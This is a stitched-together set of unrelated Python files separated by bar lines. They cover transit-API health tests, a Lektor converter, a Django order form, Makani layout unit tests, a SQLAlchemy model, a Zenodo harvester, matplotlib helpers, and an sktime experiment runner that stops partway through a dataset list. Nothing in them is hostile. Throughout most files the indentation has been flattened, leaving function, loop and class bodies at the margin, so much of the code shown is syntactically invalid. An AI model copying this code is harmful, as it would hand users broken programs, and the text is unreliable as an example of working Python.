import time
from os import environ
from datetime import datetime
from models import Application, Request, Test, TestGroup
BASE_DEV_URL = environ["TRANSIT_DEV_BACKEND_URL"]
BASE_PROD_URL = environ["TRANSIT_BACKEND_URL"]
GTFS_EXPIRATION_BUFFER = 7 # number of days before GTFS feed expiration date
# We want to verify that /allstops returns a list of type 'busStop' only
def allstops_returns_bus_stops(r):
response = r.json()
# Make sure response was successful
if not response["success"]:
return False
# Iterate over stops
for stop in response["data"]:
# Check that the BusStop object is properly decoded
if "type" not in stop or stop["type"] != "busStop":
return False
return True
# There should always be at least one walking route displayed to the user
def at_least_one_walking_route(r):
response = r.json()
# Make sure response was successful
if not response["success"]:
return False
# Verify list of walking directions is not empty
walking_directions = response["data"]["walking"]
    return walking_directions is not None and len(walking_directions) > 0
def check_gtfs_feed_expiration(r):
response = r.json()
# Make sure response was successful
if not response["success"]:
return False
end_date = datetime.strptime(response["data"]["feed_end_date"], "%Y%m%d")
today = datetime.today()
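    # Only pass if the feed remains valid for more than GTFS_EXPIRATION_BUFFER days from today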
if today < end_date:
return (end_date - today).days > GTFS_EXPIRATION_BUFFER
return False
# We want to verify that route numbers are non-null, or that they will not show up as
# -1 inside of the application.
def route_number_non_null_callback(r):
response = r.json()
# Make sure response was successful
if not response["success"]:
return False
# Iterate over directions
for route_directions in response["data"]["boardingSoon"]:
for direction in route_directions["directions"]:
# Walking directions can have a [None] routeNumber
if direction["type"] != "walk" and direction["routeNumber"] is None:
return False
return True
# The 'Boarding Soon' section should not contain any walking routes, as they should
# be explicitly within the 'Walking' section.
def no_walking_routes_in_boarding_soon(r):
response = r.json()
# Make sure response was successful
if not response["success"]:
return False
# Iterate over directions
for route_directions in response["data"]["boardingSoon"]:
if route_directions["numberOfTransfers"] == -1:
return False
return True
# We want to ensure that given a query string, /search does not result in an error,
# namely "Cannot read property 'filter' of null," and instead returns a list of
# valid suggestions - autocomplete results that are either of type 'applePlace' or 'busStop'.
def search_returns_suggestions(r):
response = r.json()
# Make sure response was successful
if not response["success"]:
print("not successful")
return False
    # The response data should only contain the two types of search suggestions
    for key in response["data"]:
        if key not in ["applePlaces", "busStops"]:
            return False
    # Check that each suggestion is decoded with the expected type
    for busStop in response["data"]["busStops"]:
        if busStop.get("type") != "busStop":
            return False
    for applePlace in response["data"]["applePlaces"]:
        if applePlace.get("type") != "applePlace":
            return False
    return True
def generate_tests(base_url):
return [
Test(
name="Live Tracking 200",
request=Request(
method="GET",
# TODO: Change in future, currently 5000 can only be accessed over http
url=base_url[:-1].replace("https", "http") + ":5000",
),
),
Test(name="api/docs 200", request=Request(method="GET", url=base_url + "api/docs/")),
Test(name="api/v1/allstops 200", request=Request(method="GET", url=base_url + "api/v1/allstops/")),
Test(
name="api/v2/route 200",
request=Request(
method="POST",
url=base_url + "api/v2/route/",
payload={
"arriveBy": False,
"end": "42.454197,-76.440651",
"start": "42.449086,-76.483306",
"destinationName": 933,
"time": time.time(),
},
),
),
Test(
name="api/v2/route does not contain -1",
request=Request(
method="POST",
url=base_url + "api/v2/route/",
payload={
"arriveBy": False,
"end": "42.454197,-76.440651",
"start": "42.449086,-76.483306",
"destinationName": 933,
"time": time.time(),
},
),
callback=route_number_non_null_callback,
),
Test(
name="No walking routes in boardingSoon (/api/v2/route)",
request=Request(
method="POST",
url=base_url + "api/v2/route/",
payload={
"arriveBy": False,
"end": "42.445228,-76.485053", # Uris Library
"start": "42.440847,-76.483741", # Collegetown
"destinationName": 933,
"time": time.time(),
},
),
callback=no_walking_routes_in_boarding_soon,
),
Test(
name="api/v2/appleSearch contains applePlaces and busStops",
request=Request(method="POST", url=base_url + "api/v2/appleSearch", payload={"query": "st"}),
callback=search_returns_suggestions,
),
Test(
name="api/v1/allstops only contains busStops",
request=Request(method="GET", url=base_url + "api/v1/allstops/"),
callback=allstops_returns_bus_stops,
),
Test(
name="At least one walking route shown (/api/v2/route)",
request=Request(
method="POST",
url=base_url + "api/v2/route/",
payload={
"arriveBy": False,
"end": "42.445228,-76.485053", # Uris Library
"start": "42.440847,-76.483741", # Collegetown
"destinationName": 933,
"time": time.time(),
},
),
callback=at_least_one_walking_route,
),
]
transit_dev_tests = TestGroup(application=Application.TRANSIT, name="Transit Dev", tests=generate_tests(BASE_DEV_URL))
transit_prod_tests = TestGroup(
application=Application.TRANSIT, name="Transit Prod", tests=generate_tests(BASE_PROD_URL)
)
|
# -*- coding: utf-8 -*-
# main converter file, converts datasheet to Lektor format
import glob
import os
import json
import re
import htmlparser
import referenceparser
import symbolreplace
def convert(datasheet, url_context):
data = {}
# metadata, the template and model
data['_model'] = 'glossary'
data['_template'] = 'glossary.html'
# easily translatable info
data['term'] = symbolreplace.strip_tags(symbolreplace.tags_to_unicode(datasheet['WORD']))
# parse biography, and add in extras and translations
data['content'] = htmlparser.parse(datasheet['CONTENTS'],
datasheet['FILENAME'],
paragraphs=True,
url_context=url_context)
return data
|
from .image import Image, ImageWindow
from .image_bmp import ImageBmp
|
from django import forms
from .models import Transportadora, FormaPagamento
class FinalizarPedido(forms.Form):
"""
Formulário para receber qual opção de transportadora e forma de pagamento o usuário deseja
Attribute transportadora: Recebe a opção de transportadora que o usuário escolher
Attribute forma_pagamento: Recebe a opção de forma de pagamento que o usuário escolher
"""
transportadora = forms.ChoiceField(choices=[], widget=forms.RadioSelect)
forma_pagamento = forms.ChoiceField(choices=[], widget=forms.RadioSelect)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields['transportadora'].choices = Transportadora.receber()
self.fields['forma_pagamento'].choices = FormaPagamento.receber()
|
# Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from makani.gs.monitor2.apps.layout import autogen
from makani.gs.monitor2.apps.layout import base
from makani.gs.monitor2.apps.layout import layout_util
from makani.gs.monitor2.apps.receiver import test_util
from makani.lib.python import struct_tree
class TestPlotData(unittest.TestCase):
def testPlotData(self):
template = base.PlotData(None)
self.assertEqual(template.apple, 'apple')
self.assertEqual(template.banana, 'banana')
data = base.PlotData(template)
data.apple = 'red'
banana_status = {
'yellow': 'good',
'black': 'bad',
}
data.banana = banana_status
self.assertEqual(data.Json(), {
'apple': 'red',
'banana': banana_status,
})
with self.assertRaises(base.MonitorLayoutException):
data.orange = 1
def testGetDistinguishableNames(self):
self.assertEqual(
layout_util.GetDistinguishableNames(['Day.NewYork.BigApple',
'Night.NewYork.BigMelon'],
'.', ['Big']),
{'Day.NewYork.BigApple': 'Day.Apple',
'Night.NewYork.BigMelon': 'Night.Melon'})
self.assertEqual(
layout_util.GetDistinguishableNames(['Day.NewYork',
'Day.NewYork.BigMelon'],
'.', ['Big']),
{'Day.NewYork': 'NewYork',
'Day.NewYork.BigMelon': 'NewYork.Melon'})
class TestAutogen(unittest.TestCase):
def testBasics(self):
messages = struct_tree.StructTree({
'MotorStatus': {
'MotorPbi': {
'status': 0,
'errors': [1, 2, 3],
'details': {'temp': 60, 'voltage': 800},
}
}
}, fail_silently=False, readonly=True)
scenario = autogen.GenerateScenario(messages.Data(), 'Test')
self.assertEqual(scenario, {
'signals': {},
'canvas': {
'row_height_px': 40,
'grid_width': 12
},
'views': [
{
'stripe': [
{
'indicators': [
{
'src': 'MotorStatus.MotorPbi.details.temp',
'name': 'details.temp',
'cols': 12,
'precision': None,
'indicator_src': None,
'template': 'ScalarIndicator',
'font_size': None,
'mode': 'horizontal'
},
{
'src': 'MotorStatus.MotorPbi.details.voltage',
'name': 'details.voltage',
'cols': 12,
'precision': None,
'indicator_src': None,
'template': 'ScalarIndicator',
'font_size': None,
'mode': 'horizontal'
},
{
'message_src': None,
'src': 'MotorStatus.MotorPbi.errors',
'mode': 'horizontal',
'template': 'ListIndicator',
'indicator_src': None,
'keys': [
'[0]',
'[1]',
'[2]'
],
'precision': None,
'cols': 12,
'font_size': None,
'name': 'errors'
},
{
'src': 'MotorStatus.MotorPbi.status',
'name': 'status',
'cols': 12,
'precision': None,
'indicator_src': None,
'template': 'ScalarIndicator',
'font_size': None,
'mode': 'horizontal'
}
],
'rows': 3,
'name': 'MotorStatus.MotorPbi',
'grid_width': 12
}
],
'grid_width': 12
}
],
'filters': [],
'title': 'Test'
})
def testCtypes(self):
messages = test_util.SynthesizeMessages(['ControlTelemetry'], 0)
# Run and make sure there are no faults.
autogen.GenerateScenario(messages.Data(convert_to_basic_types=True), 'Test')
if __name__ == '__main__':
unittest.main()
|
import sqlalchemy as sa
from .db_session import SqlAlchemyBase
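# SQLAlchemy model for a forum entry; every text field is optional (nullable)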
class Forum(SqlAlchemyBase):
__tablename__ = 'forums'
__table_args__ = {'extend_existing': True}
id = sa.Column(sa.Integer,
primary_key=True, autoincrement=True)
name = sa.Column(sa.String, nullable=True)
title = sa.Column(sa.String, nullable=True)
lesson = sa.Column(sa.String, nullable=True)
quest = sa.Column(sa.String, nullable=True)
results = sa.Column(sa.String, nullable=True)
user = sa.Column(sa.String, nullable=True)
|
'''
Harvester for Zenodo for the SHARE project
Example API call: https://zenodo.org/oai2d?verb=ListRecords&metadataPrefix=oai_dc
'''
from __future__ import unicode_literals
from scrapi.base import OAIHarvester
class ZenodoHarvester(OAIHarvester):
short_name = 'zenodo'
long_name = 'Zenodo'
url = 'https://zenodo.org/oai2d'
base_url = 'https://zenodo.org/oai2d'
property_list = ['language', 'rights', 'source', 'relation', 'date', 'identifier', 'type']
timezone_granularity = True
|
import scipy.interpolate as interpolate
import matplotlib
import matplotlib.image as image
from matplotlib import rc, rcParams
import numpy as np
def get_ax_size(fig, ax):
'''
Returns the size of a given axis in pixels
Args:
fig (matplotlib figure)
ax (matplotlib axes)
'''
bbox = ax.get_window_extent().transformed(fig.dpi_scale_trans.inverted())
width, height = bbox.width, bbox.height
width *= fig.dpi
height *= fig.dpi
return width, height
def place_image(fig, ax, image_name, xsize, xpos, ypos, zorder=10):
'''
Places an image on a given axes whilst maintaining its aspect ratio
Args:
fig (matplotlib figure)
ax (matplotlib axes)
image_name (string): name of image to place on axes
xsize(float): size of the x-dimension of object given as fraction of the axes length
xpos(float): x-coordinate of image given as fraction of axes
ypos(float): y-coordinate of image given as fraction of axes
'''
im = image.imread(image_name)
xrange=ax.get_xlim()[1]-ax.get_xlim()[0]
yrange=ax.get_ylim()[1]-ax.get_ylim()[0]
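    # derive ysize from the image aspect ratio, corrected by the axes' pixel dimensions,
    # so the placed image keeps its original aspect ratio in data coordinates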
ysize=(im.shape[0]/im.shape[1])*(xsize*get_ax_size(fig,ax)[0])/get_ax_size(fig,ax)[1]
xsize *= xrange
ysize *= yrange
xpos = (xpos*xrange) + ax.get_xlim()[0]
ypos = (ypos*yrange) + ax.get_ylim()[0]
ax.imshow(im,aspect='auto',extent=(xpos,xpos+xsize,ypos,ypos+ysize),interpolation='none', zorder=zorder )
def interpolate_df(df,xrange,dx):
'''
Interpolates data in a panda dataframe
Args:
df(panda dataframe): dataframe containing data to be interpolated
xrange(int): number of data points
dx(float): interval for interpolated data outputted
Returns:
        numpy array containing interpolated x,y data'''
points=np.array( [(x[0],value) for x,value in np.ndenumerate(df.values)])
x=points[:,0]
y=points[:,1]
spline = interpolate.splrep(points[:,0],y=points[:,1],s=0)
xnew = np.arange(xrange[0],xrange[1],dx)
ynew = interpolate.splev(xnew,spline,der=0)
xnew=x # remove these lines to get spline
ynew=y # not linear
return xnew,ynew
def get_y_limits(size,zero_point):
    '''
    Computes y-axis limits for a given total axis size and zero-point position
    Args:
        size(float): total extent of the y-axis
        zero_point(float): fraction of the axis that lies below zero
    Returns:
        lower and upper y-limits (float)'''
y_top= size*(1.0-zero_point)
y_bottom= -size*(zero_point)
return y_bottom,y_top
def get_df_range(df,key):
'''
Filters a panda dataframe by key and returns its range
Args:
df(panda dataframe): dataframe containing data to be interpolated
key(string): key of data to filter
Returns:
range of data (float)'''
Channels = df.filter(regex=key)
return Channels.values.max()-Channels.values.min()
def get_df_max(df,key):
'''
Filters a panda dataframe by key and returns its max value
Args:
df(panda dataframe): dataframe containing data to be interpolated
key(string): key of data to filter
Returns:
max of data (float)'''
Channels = df.filter(regex=key)
return Channels.values.max()
def get_df_min(df,key):
'''
Filters a panda dataframe by key and returns its min
Args:
df(panda dataframe): dataframe containing data to be interpolated
key(string): key of data to filter
Returns:
min of data (float)'''
Channels = df.filter(regex=key)
return Channels.values.min()
def get_y_range(df,key,dec_f,pad):
'''
Get a suitable range for the y-axis to hold data in a panda dataframe
Args:
df(panda dataframe): dataframe containing data to be interpolated
key(string): key of data to filter
dec_f(integer): number of digits to round to
pad(float): padding either side
Returns:
suitable range of for y-data (float)'''
return round(get_df_range(df,key),dec_f)+2.0*pad
def get_y_axis_limits(df,key,zero_point,dec_f,pad):
'''
Set y-limits to hold a panda dataframe given a zero-point
Args:
df(panda dataframe): dataframe containing data to be interpolated
key(string): key of data to filter
zero_point(float): where to zero on y-axis
dec_f(integer): number of digits to round to
pad(float): padding either side
Returns:
y-limits for matplotlib axes (float)'''
yrange=get_y_range(df,key,dec_f,pad)
ymax=get_df_max(df,key)
ymin=get_df_min(df,key)
urange = max(ymax,(1.0-zero_point)*yrange)
lrange = min(ymin,-(zero_point*yrange))
total_range = round(max(urange/(1-zero_point),(-lrange/zero_point)),1)+(2*pad)
return get_y_limits(total_range,zero_point)
def line(x, m, c):
return m * x + c
# Global formatting options
matplotlib.style.use('ggplot')
nearly_black = '#161616'
light_grey = '#EEEEEE'
lighter_grey = '#F5F5F5'
colours = { 'U': '#62606f',
'LM': '#f46d43',
'LT': '#f2c23e' }
symbol = { 0.25: 'co',
0.50: 'v' }
fontsize=16
master_formatting = { 'axes.formatter.limits': (-3,3),
'xtick.major.pad': 7,
'ytick.major.pad': 7,
'ytick.color': nearly_black,
'xtick.color': nearly_black,
'axes.labelcolor': nearly_black,
'legend.facecolor': light_grey,
'pdf.fonttype': 42,
'ps.fonttype': 42,
'mathtext.fontset': 'custom',
'font.size': fontsize,
'font.family': 'serif',
'mathtext.rm': 'Minion Pro',
'mathtext.it': 'Minion Pro:italic',
'mathtext.bf': 'Minion Pro:bold',
'savefig.bbox':'tight',
'axes.facecolor': lighter_grey,
'axes.labelpad': 10.0,
'axes.labelsize': fontsize,
'axes.titlepad': 25,
'axes.spines.top': False,
'axes.spines.left': False,
'axes.spines.right': False,
'axes.spines.bottom': False,
'lines.markersize': 5.0,
'lines.markeredgewidth': 0.0,
'lines.linewidth': 1.5,
'lines.scale_dashes': False }
def set_rcParams( formatting ):
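    # copy every formatting option into matplotlib's global rcParams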
for k, v in formatting.items():
rcParams[k] = v
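# Typical usage (a sketch): call set_rcParams(master_formatting) once before creating any figures.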
|
# -*- coding: utf-8 -*-
"""Experiments: code to run experiments as an alternative to orchestration.
This file is configured for runs of the main method with command line arguments, or for
single debugging runs. Results are written in a standard format
todo: Tidy up this file!
"""
import os
import sklearn.preprocessing
import sklearn.utils
from sktime.classification.dictionary_based import (
BOSSEnsemble,
ContractableBOSS,
TemporalDictionaryEnsemble,
WEASEL,
MUSE,
)
from sktime.classification.distance_based import (
ElasticEnsemble,
ProximityForest,
ProximityTree,
ProximityStump,
KNeighborsTimeSeriesClassifier,
ShapeDTW,
)
from sktime.classification.hybrid import HIVECOTEV1
from sktime.classification.hybrid._catch22_forest_classifier import (
Catch22ForestClassifier,
)
from sktime.classification.interval_based import (
TimeSeriesForestClassifier,
RandomIntervalSpectralForest,
)
from sktime.classification.interval_based._cif import CanonicalIntervalForest
from sktime.classification.interval_based._drcif import DrCIF
from sktime.classification.kernel_based import ROCKETClassifier, Arsenal
from sktime.classification.shapelet_based import MrSEQLClassifier
from sktime.classification.shapelet_based import ShapeletTransformClassifier
os.environ["MKL_NUM_THREADS"] = "1" # must be done before numpy import!!
os.environ["NUMEXPR_NUM_THREADS"] = "1" # must be done before numpy import!!
os.environ["OMP_NUM_THREADS"] = "1" # must be done before numpy import!!
import sys
import time
import numpy as np
import pandas as pd
from sklearn import preprocessing
from sklearn.metrics import accuracy_score
from sklearn.model_selection import cross_val_predict
from sktime.utils.data_io import load_from_tsfile_to_dataframe as load_ts
import sktime.datasets.tsc_dataset_names as dataset_lists
__author__ = ["Tony Bagnall"]
"""Prototype mechanism for testing classifiers on the UCR format. This mirrors the
mechanism used in Java,
https://github.com/TonyBagnall/uea-tsc/tree/master/src/main/java/experiments
but is not yet as engineered. However, if you generate results using the method
recommended here, they can be directly and automatically compared to the results
generated in java
"""
classifier_list = [
# Distance based
"ProximityForest",
"KNeighborsTimeSeriesClassifier",
"ElasticEnsemble",
"ShapeDTW",
# Dictionary based
"BOSS",
"ContractableBOSS",
"TemporalDictionaryEnsemble",
"WEASEL",
"MUSE",
# Interval based
"RandomIntervalSpectralForest",
"TimeSeriesForestClassifier",
"CanonicalIntervalForest",
# Shapelet based
"ShapeletTransformClassifier",
"MrSEQLClassifier",
# Kernel based
"ROCKET",
"Arsenal",
]
def set_classifier(cls, resampleId=None):
"""Construct a classifier.
    Basic way of creating the classifier to build using the default settings. This
    set-up is to help with batch jobs for multiple problems to facilitate easy
    reproducibility. You can set up a bespoke classifier in many other ways.
Parameters
----------
cls: String indicating which classifier you want
resampleId: classifier random seed
Return
------
A classifier.
"""
name = cls.lower()
# Distance based
if name == "pf" or name == "proximityforest":
return ProximityForest(random_state=resampleId)
elif name == "pt" or name == "proximitytree":
return ProximityTree(random_state=resampleId)
elif name == "ps" or name == "proximityStump":
return ProximityStump(random_state=resampleId)
elif name == "dtwcv" or name == "kneighborstimeseriesclassifier":
return KNeighborsTimeSeriesClassifier(distance="dtwcv")
elif name == "dtw" or name == "1nn-dtw":
return KNeighborsTimeSeriesClassifier(distance="dtw")
elif name == "msm" or name == "1nn-msm":
return KNeighborsTimeSeriesClassifier(distance="msm")
elif name == "ee" or name == "elasticensemble":
return ElasticEnsemble()
elif name == "shapedtw":
return ShapeDTW()
# Dictionary based
elif name == "boss" or name == "bossensemble":
return BOSSEnsemble(random_state=resampleId)
elif name == "cboss" or name == "contractableboss":
return ContractableBOSS(random_state=resampleId)
elif name == "tde" or name == "temporaldictionaryensemble":
return TemporalDictionaryEnsemble(random_state=resampleId)
elif name == "weasel":
return WEASEL(random_state=resampleId)
elif name == "muse":
return MUSE(random_state=resampleId)
# Interval based
elif name == "rise" or name == "randomintervalspectralforest":
return RandomIntervalSpectralForest(random_state=resampleId)
elif name == "tsf" or name == "timeseriesforestclassifier":
return TimeSeriesForestClassifier(random_state=resampleId)
elif name == "cif" or name == "canonicalintervalforest":
return CanonicalIntervalForest(random_state=resampleId)
elif name == "drcif":
return DrCIF(random_state=resampleId)
# Shapelet based
elif name == "stc" or name == "shapelettransformclassifier":
return ShapeletTransformClassifier(
random_state=resampleId, transform_contract_in_mins=60
)
elif name == "mrseql" or name == "mrseqlclassifier":
return MrSEQLClassifier(seql_mode="fs", symrep=["sax", "sfa"])
elif name == "rocket":
return ROCKETClassifier(random_state=resampleId)
elif name == "arsenal":
return Arsenal(random_state=resampleId)
# Hybrid
elif name == "catch22":
return Catch22ForestClassifier(random_state=resampleId)
elif name == "hivecotev1":
return HIVECOTEV1(random_state=resampleId)
else:
raise Exception("UNKNOWN CLASSIFIER")
def stratified_resample(X_train, y_train, X_test, y_test, random_state):
"""Resample data using a random state.
    Reproducible resampling. Combines train and test, resamples to get the same class
    distribution, then returns new train and test.
    Parameters
    ----------
    X_train: train data attributes in sktime pandas format.
    y_train: train data class labels as np array.
    X_test: test data attributes in sktime pandas format.
    y_test: test data class labels as np array.
Returns
-------
new train and test attributes and class labels.
"""
all_labels = np.concatenate((y_train, y_test), axis=None)
all_data = pd.concat([X_train, X_test])
random_state = sklearn.utils.check_random_state(random_state)
# count class occurrences
unique_train, counts_train = np.unique(y_train, return_counts=True)
unique_test, counts_test = np.unique(y_test, return_counts=True)
assert list(unique_train) == list(
unique_test
) # haven't built functionality to deal with classes that exist in
# test but not in train
# prepare outputs
X_train = pd.DataFrame()
y_train = np.array([])
X_test = pd.DataFrame()
y_test = np.array([])
# for each class
for label_index in range(0, len(unique_train)):
# derive how many instances of this class from the counts
num_instances = counts_train[label_index]
# get the indices of all instances with this class label
label = unique_train[label_index]
indices = np.where(all_labels == label)[0]
# shuffle them
random_state.shuffle(indices)
# take the first lot of instances for train, remainder for test
train_indices = indices[0:num_instances]
test_indices = indices[num_instances:]
del indices # just to make sure it's not used!
# extract data from corresponding indices
train_instances = all_data.iloc[train_indices, :]
test_instances = all_data.iloc[test_indices, :]
train_labels = all_labels[train_indices]
test_labels = all_labels[test_indices]
# concat onto current data from previous loop iterations
X_train = pd.concat([X_train, train_instances])
X_test = pd.concat([X_test, test_instances])
y_train = np.concatenate([y_train, train_labels], axis=None)
y_test = np.concatenate([y_test, test_labels], axis=None)
# get the counts of the new train and test resample
unique_train_new, counts_train_new = np.unique(y_train, return_counts=True)
unique_test_new, counts_test_new = np.unique(y_test, return_counts=True)
# make sure they match the original distribution of data
assert list(counts_train_new) == list(counts_train)
assert list(counts_test_new) == list(counts_test)
return X_train, y_train, X_test, y_test
def run_experiment(
problem_path,
results_path,
cls_name,
dataset,
classifier=None,
resampleID=0,
overwrite=False,
format=".ts",
train_file=False,
):
"""Run a classification experiment.
Method to run a basic experiment and write the results to files called
testFold<resampleID>.csv and, if required, trainFold<resampleID>.csv.
Parameters
----------
problem_path: Location of problem files, full path.
results_path: Location of where to write results. Any required directories
will be created
cls_name: determines which classifier to use, as defined in set_classifier.
This assumes predict_proba is
implemented, to avoid predicting twice. May break some classifiers though
dataset: Name of problem. Files must be <problem_path>/<dataset>/<dataset>+
"_TRAIN"+format, same for "_TEST"
resampleID: Seed for resampling. If set to 0, the default train/test split
from file is used. Also used in output file name.
overwrite: if set to False, this will only build results if there is not a
result file already present. If
True, it will overwrite anything already there
format: Valid formats are ".ts", ".arff" and ".long".
For more info on format, see examples/Loading%20Data%20Examples.ipynb
train_file: whether to generate train files or not. If true, it performs a
10xCV on the train and saves
"""
build_test = True
if not overwrite:
full_path = (
str(results_path)
+ "/"
+ str(cls_name)
+ "/Predictions/"
+ str(dataset)
+ "/testFold"
+ str(resampleID)
+ ".csv"
)
if os.path.exists(full_path):
print(
full_path
+ " Already exists and overwrite set to false, not building Test"
)
build_test = False
if train_file:
full_path = (
str(results_path)
+ "/"
+ str(cls_name)
+ "/Predictions/"
+ str(dataset)
+ "/trainFold"
+ str(resampleID)
+ ".csv"
)
if os.path.exists(full_path):
print(
full_path
+ " Already exists and overwrite set to false, not building Train"
)
train_file = False
    if not train_file and not build_test:
return
# TO DO: Automatically differentiate between problem types,
# currently only works with .ts
trainX, trainY = load_ts(problem_path + dataset + "/" + dataset + "_TRAIN" + format)
testX, testY = load_ts(problem_path + dataset + "/" + dataset + "_TEST" + format)
if resampleID != 0:
# allLabels = np.concatenate((trainY, testY), axis = None)
# allData = pd.concat([trainX, testX])
# train_size = len(trainY) / (len(trainY) + len(testY))
# trainX, testX, trainY, testY = train_test_split(allData, allLabels,
# train_size=train_size,
# random_state=resampleID, shuffle=True,
# stratify=allLabels)
trainX, trainY, testX, testY = stratified_resample(
trainX, trainY, testX, testY, resampleID
)
le = preprocessing.LabelEncoder()
le.fit(trainY)
trainY = le.transform(trainY)
testY = le.transform(testY)
if classifier is None:
classifier = set_classifier(cls_name, resampleID)
print(cls_name + " on " + dataset + " resample number " + str(resampleID))
if build_test:
# TO DO : use sklearn CV
start = int(round(time.time() * 1000))
classifier.fit(trainX, trainY)
build_time = int(round(time.time() * 1000)) - start
start = int(round(time.time() * 1000))
probs = classifier.predict_proba(testX)
preds = classifier.classes_[np.argmax(probs, axis=1)]
test_time = int(round(time.time() * 1000)) - start
ac = accuracy_score(testY, preds)
print(
cls_name
+ " on "
+ dataset
+ " resample number "
+ str(resampleID)
+ " test acc: "
+ str(ac)
+ " time: "
+ str(test_time)
)
# print(str(classifier.findEnsembleTrainAcc(trainX, trainY)))
if "Composite" in cls_name:
second = "Para info too long!"
else:
second = str(classifier.get_params())
        second = second.replace("\n", " ")
        second = second.replace("\r", " ")
print(second)
temp = np.array_repr(classifier.classes_).replace("\n", "")
third = (
str(ac)
+ ","
+ str(build_time)
+ ","
+ str(test_time)
+ ",-1,-1,"
+ str(len(classifier.classes_))
)
write_results_to_uea_format(
second_line=second,
third_line=third,
output_path=results_path,
classifier_name=cls_name,
resample_seed=resampleID,
predicted_class_vals=preds,
actual_probas=probs,
dataset_name=dataset,
actual_class_vals=testY,
split="TEST",
)
if train_file:
start = int(round(time.time() * 1000))
if build_test and hasattr(
classifier, "_get_train_probs"
        ): # Normally can only do this if test has been built
train_probs = classifier._get_train_probs(trainX)
else:
train_probs = cross_val_predict(
classifier, X=trainX, y=trainY, cv=10, method="predict_proba"
)
train_time = int(round(time.time() * 1000)) - start
train_preds = classifier.classes_[np.argmax(train_probs, axis=1)]
train_acc = accuracy_score(trainY, train_preds)
print(
cls_name
+ " on "
+ dataset
+ " resample number "
+ str(resampleID)
+ " train acc: "
+ str(train_acc)
+ " time: "
+ str(train_time)
)
if "Composite" in cls_name:
second = "Para info too long!"
else:
second = str(classifier.get_params())
        second = second.replace("\n", " ")
        second = second.replace("\r", " ")
temp = np.array_repr(classifier.classes_).replace("\n", "")
third = (
str(train_acc)
+ ","
+ str(train_time)
+ ",-1,-1,-1,"
+ str(len(classifier.classes_))
)
write_results_to_uea_format(
second_line=second,
third_line=third,
output_path=results_path,
classifier_name=cls_name,
resample_seed=resampleID,
predicted_class_vals=train_preds,
actual_probas=train_probs,
dataset_name=dataset,
actual_class_vals=trainY,
split="TRAIN",
)
def write_results_to_uea_format(
output_path,
classifier_name,
dataset_name,
actual_class_vals,
predicted_class_vals,
split="TEST",
resample_seed=0,
actual_probas=None,
second_line="No Parameter Info",
third_line="N/A",
class_labels=None,
):
"""Write results to file.
Outputs the classifier results, mirrors that produced by tsml Java package.
Directories of the form
<output_path>/<classifier_name>/Predictions/<dataset_name>
Will automatically be created and results written.
Parameters
----------
output_path: string, root path where to put results.
classifier_name: string, name of the classifier that made the predictions
dataset_name: string, name of the problem the classifier was built on
actual_class_vals: array, actual class labels
predicted_class_vals: array, predicted class labels
    split: string, either TRAIN or TEST, depending on the results.
resample_seed: int, makes resampling deterministic
actual_probas: number of cases x number of classes 2d array
second_line: unstructured, classifier parameters
third_line: summary performance information (see comment below)
class_labels: needed to equate to tsml output
"""
if len(actual_class_vals) != len(predicted_class_vals):
raise IndexError(
"The number of predicted class values is not the same as the "
+ "number of actual class values"
)
try:
os.makedirs(
str(output_path)
+ "/"
+ str(classifier_name)
+ "/Predictions/"
+ str(dataset_name)
+ "/"
)
except os.error:
pass # raises os.error if path already exists
if split == "TRAIN" or split == "train":
train_or_test = "train"
elif split == "TEST" or split == "test":
train_or_test = "test"
else:
raise ValueError("Unknown 'split' value - should be TRAIN/train or TEST/test")
file = open(
str(output_path)
+ "/"
+ str(classifier_name)
+ "/Predictions/"
+ str(dataset_name)
+ "/"
+ str(train_or_test)
+ "Fold"
+ str(resample_seed)
+ ".csv",
"w",
)
# <classifierName>,<datasetName>,<train/test>,<Class Labels>
file.write(
str(dataset_name)
+ ","
+ str(classifier_name)
+ ","
+ str(train_or_test)
+ ","
+ str(resample_seed)
+ ",MILLISECONDS,PREDICTIONS, Generated by classification_experiments.py"
)
file.write("\n")
# the second line of the output is free form and classifier-specific;
# usually this will record info
# such as parameter options used, any constituent model names for ensembles, etc.
file.write(str(second_line) + "\n")
# the third line of the file is the accuracy (should be between 0 and 1 inclusive).
# If this is a train output file then it will be a training estimate of the
# classifier on the training data only (e.g. #10-fold cv, leave-one-out cv, etc.).
# If this is a test output file, it should be the output of the estimator on the
# test data (likely trained on the training data for a-priori para optimisation)
file.write(str(third_line))
file.write("\n")
# from line 4 onwards each line should include the actual and predicted class labels
# (comma-separated). If present, for each case, the probabilities of predicting
# every class value for this case should also be appended to the line (a space is
# also included between the predicted value and the predict_proba). E.g.:
# if predict_proba data IS provided for case i:
    # actual_class_val[i], predicted_class_val[i],,prob_class_0[i],prob_class_1[i],...,prob_class_c[i]
#
# if predict_proba data IS NOT provided for case i:
# actual_class_val[i], predicted_class_val[i]
for i in range(0, len(predicted_class_vals)):
file.write(str(actual_class_vals[i]) + "," + str(predicted_class_vals[i]))
if actual_probas is not None:
file.write(",")
for j in actual_probas[i]:
file.write("," + str(j))
file.write("\n")
file.close()
def test_loading():
"""Test function to check dataset loading of univariate and multivaria problems."""
for i in range(0, len(dataset_lists.univariate)):
data_dir = "E:/tsc_ts/"
dataset = dataset_lists.univariate[i]
trainX, trainY = load_ts(data_dir + dataset + "/" + dataset + "_TRAIN.ts")
testX, testY = load_ts(data_dir + dataset + "/" + dataset + "_TEST.ts")
print("Loaded " + dataset + " in position " + str(i))
print("Train X shape :")
print(trainX.shape)
print("Train Y shape :")
print(trainY.shape)
print("Test X shape :")
print(testX.shape)
print("Test Y shape :")
print(testY.shape)
for i in range(16, len(dataset_lists.multivariate)):
data_dir = "E:/mtsc_ts/"
dataset = dataset_lists.multivariate[i]
print("Loading " + dataset + " in position " + str(i) + ".......")
trainX, trainY = load_ts(data_dir + dataset + "/" + dataset + "_TRAIN.ts")
testX, testY = load_ts(data_dir + dataset + "/" + dataset + "_TEST.ts")
print("Loaded " + dataset)
print("Train X shape :")
print(trainX.shape)
print("Train Y shape :")
print(trainY.shape)
print("Test X shape :")
print(testX.shape)
print("Test Y shape :")
print(testY.shape)
benchmark_datasets = [
"ACSF1",
